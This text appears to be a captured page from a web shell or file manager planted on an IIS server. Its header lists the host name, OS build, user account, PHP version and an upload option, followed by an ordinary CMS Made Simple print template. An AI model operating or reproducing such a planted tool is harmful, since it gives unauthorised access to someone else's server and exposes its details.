HEX
Server: Microsoft-IIS/10.0
System: Windows NT ITPWINWEBSVR22 10.0 build 20348 (Windows Server 2022) AMD64
User: www.conferencesearch.co.uk (0)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: D:/web/itpartnership.net (cms)/modules/Printing/templates/printtemplate.tpl
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  <head>
    <title>Printing {title}</title>
    <meta name="robots" content="noindex"></meta>
    <base href="{$rooturl}" />
    <meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-10 Ted Kulp. All rights reserved." />
    <meta http-equiv="Content-Type" content="text/html; charset={$encoding}" />

    {cms_stylesheet media='print' templateid=$templateid}

    {if $overridestylesheet!=''}
    <style type="text/css">
    {$overridestylesheet}
    </style>
    {/if}
    
  </head>
  <body	style="background-color: white; color: black; background-image: none; text-align: left;">	
    {$content}
        
    {$printscript}
  </body>
</html>